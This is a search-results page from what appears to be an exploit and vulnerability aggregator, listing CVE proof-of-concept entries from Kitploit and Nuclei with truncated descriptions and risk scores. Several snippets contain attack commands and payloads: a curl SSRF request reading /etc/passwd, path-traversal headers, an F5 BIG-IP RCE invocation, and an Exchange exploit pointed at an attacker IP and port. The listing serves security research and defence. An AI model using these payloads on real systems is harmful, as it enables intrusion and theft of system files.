Lucene search
+L

1013 matches found

Kitploit
Kitploit
added 2026/09/19 9:07 p.m.11 views

CVE-2025-66516-POC

⚠️ READ DISCLAIMER BEFORE USE ⚠️ Educational/Authorized Testing Only | License | Security Policy About This POC...

9.8CVSS7.9AI score0.87688EPSS
SaveExploits6References3
Kitploit
Kitploit
added 2026/09/19 8:30 p.m.14 views

CVE-2020-1938

CVE-2020-1938 Esta CVE-2020-1938 corrige errores del PoC de https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat.git y se ha verificado su funcionamiento en Apache Tomcat/8.0.43. Método de práctica 1. Crear docker-compose.yml 2. docker compose up -d 3. python3...

9.8CVSS7.6AI score0.9927EPSS
SaveExploits51References1
Kitploit
Kitploit
added 2026/09/19 7:58 p.m.5 views

CVE-2025-13796-PoC

CVE-2025-13796-PoC deco-cx apps Parámetro analyticsScript.ts AnalyticsScript falsificación de solicitud del lado del servidor PoC : root@kitploit: curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: x.x.x.x' \ $'http://x.x.x.x/live/invoke/website/loaders/analyticsScript.ts?url=file:///etc/passwd'...

6.5CVSS7AI score0.00319EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/19 6:07 p.m.10 views

CVE-2026-45504

CVE-2026-45504 Lectura de archivos de Exchange CVE-2026-45504 Exchange File Read Blog de investigación python3 CVE-2026-45504.py --attacker-ip 192.168.2.238 --attacker-port 9020 --creds [email protected] --password Hawktrace1 --target https://mail.exchange.local --target-file...

8.8CVSS8AI score0.00846EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 5:44 p.m.8 views

CVE-2022-44268

CVE-2022-44268 Este repositorio contiene una Prueba de Concepto POC para una vulnerabilidad en ImageMagick v. 7.1.0-49, una biblioteca de manipulación de imágenes de código abierto ampliamente utilizada. La vulnerabilidad permite a un atacante incrustar el contenido de un archivo arbitrario en un...

6.5CVSS7.7AI score0.89855EPSS
SaveExploits28References1
Kitploit
Kitploit
added 2026/09/19 3:31 p.m.9 views

CVE-2024-28752

Apache CXF CVE-2024-28752 Entorno de reproducción Anuncio de vulnerabilidad: https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt Inicio del entorno samples/javafirstjaxwsfactorybean IDEA Inicie el servicio webservice a través de ServerStarter.java Compilación Usar JDK8 root@kitploi...

9.3CVSS7.3AI score0.02468EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/19 2:20 p.m.9 views

CVE-2021-36750

CVE-2021-36749 About - In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server...

8.1CVSS7.2AI score0.80907EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/19 11:13 a.m.10 views

CVE-2020-5902

CVE-2020-5902 Script de Python para explotar F5 Big-IP CVE-2020-5902 Ejemplos Explotación de lectura de archivo local: python3 CVE-2020-5902.py -t example.com -x lfr -f /etc/passwd Explotación RCE: python3 CVE-2020-5902.py -t example.com -x rce -a list+auth+user+admin...

10CVSS7.9AI score0.99999EPSS
SaveExploits62
Kitploit
Kitploit
added 2026/09/19 10:56 a.m.7 views

CVE-2024-28995

CVE-2024-28995 Path Traversal Automatizado y Lectura de Archivos Locales Características Detección de Versión : Recupera la versión de Serv-U desde la cabecera del servidor. Comprobación de Vulnerabilidad : Compara la versión detectada con una versión vulnerable conocida 15.4.2 o inferior. Prueba...

8.6CVSS8.3AI score0.99614EPSS
SaveExploits8References1
Kitploit
Kitploit
added 2026/09/19 10:52 a.m.5 views

CVE-2019-8389

CVE-2019-8389 - Arbitrary file read in Musicloud for iOS v1.6 CVE-2019-8389 An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application Description: A file-read vulnerability was identified in the Wi-Fi transfer feature of Musicloud 1.6. By default, the...

8.1CVSS7.7AI score0.01459EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/19 10:32 a.m.7 views

CVE-2016-10956-mail-masta

Mail Masta - Lectura Local de Archivos CVE-2016-10956 El plugin mail-masta 1.0 para WordPress tiene lectura de archivos local en countofsend.php y csvexport.php. Uso root@kitploit: $ ./CVE-2016-10956mailmasta.py -h + Mail Masta - Local File Read CVE-2016-10956 usage: CVE-2016-10956mailmasta.py -h...

7.5CVSS7.8AI score0.10582EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/19 10:00 a.m.8 views

CVE-2024-40422

CVE-2024-40422 Encontré esto en exploit-db, decidí hacer el mío propio para practicar. Este exploit buscará el archivo passwd e imprimirá su contenido en un sistema vulnerable. Este script explota una vulnerabilidad de path traversal en Devika v1. Créditos a Alperen Ergel por encontrar la...

9.1CVSS8.2AI score0.11323EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/19 8:15 a.m.13 views

CVE-2019-5418

CVE-2019-5418 Caso de prueba Ejecutar : root@kitploit: $ rails s PoC : root@kitploit: Accept: ../../../../../../../../etc/passwd Petición 1 - root@kitploit: GET /shitblock HTTP/1.1 Host: REDACTED:3000 User-Agent: Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:65.0 Gecko/20100101 Firefox/65.0 Accept:...

7.5CVSS7.4AI score0.98507EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/19 4:50 a.m.15 views

CVE-2026-12243-NLTK-PoC

CVE-2026-12243 — NLTK Path Traversal Lab A small, reproducible Docker lab that contrasts the percent-encoded path traversal behavior in NLTK 3.9.4 with the corrected behavior in NLTK 3.10.0. The vulnerable version validates the resource name before URL decoding. The fixed payload...

7.6AI score0.00583EPSS
SaveExploits1References5
Kitploit
Kitploit
added 2026/09/19 2:19 a.m.8 views

mpDNS

mpDNS también conocido como servidor DNS multipropósito Servidor DNS simple, configurable con múltiples características útiles Python 3 names.db - contiene todos los registros personalizados ver ejemplos Comodines simples como .example.com Captura solicitudes DNS unicode Acciones personalizadas...

6.1AI score
SaveExploits0References1
Nuclei
Nuclei
added 2026/09/19 2:05 a.m.303 views

Eclipse Mojarra - Local File Read

Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter. id: CVE-2020-6950 info: name: Eclipse Mojarra - Local File Read author: iamnoooob,pdresearch severity: medium description: | Directory traversal in Eclipse Mojarra...

6.5CVSS7.2AI score0.10124EPSS
SaveExploits0References5
Nuclei
Nuclei
added 2026/09/19 2:05 a.m.239 views

Vitest Browser Mode - Local File Read

Vitest is a testing framework powered by Vite. The screenshot-error handler on the browser mode HTTP server that responds any file on the file system. Especially if the server is exposed on the network by browser.api.host- true, an attacker can send a request to that handler from remote to get th...

7.5CVSS6.9AI score0.02403EPSS
SaveExploits0References6
Nuclei
Nuclei
added 2026/09/19 2:05 a.m.113 views

LocalAI - Partial Local File Read

A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery SSRF and partial Local File Inclusion LFI. The endpoint supports both https-// and file-// schemes, where the latter can lead to LFI. However, the output is limited due to the...

5.8CVSS6AI score0.0265EPSS
SaveExploits1References3
Nuclei
Nuclei
added 2026/09/19 2:05 a.m.65 views

BOA Web Server 0.94.14 - Arbitrary File Access

BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. id: CVE-2017-9833 info: name: BOA Web Server 0.94.14 - Arbitrary File Acces...

7.8CVSS7.5AI score0.68464EPSS
SaveExploits6References5
Kitploit
Kitploit
added 2026/09/18 8:58 p.m.9 views

CVE-2024-55557

CVE-2024-55557 Uso root@kitploit: python3 exploit.py --local retrieve from local readable files python3 exploit.py default mode is remote Más Leer más sobre CVE-2024-55557 - Weasis 4.5.1 POC https://github.com/user-attachments/assets/a3f64a58-7720-4f93-8bcc-9393d8afcb68...

9.8CVSS6AI score0.01366EPSS
SaveExploits1References1
Rows per page
Query Builder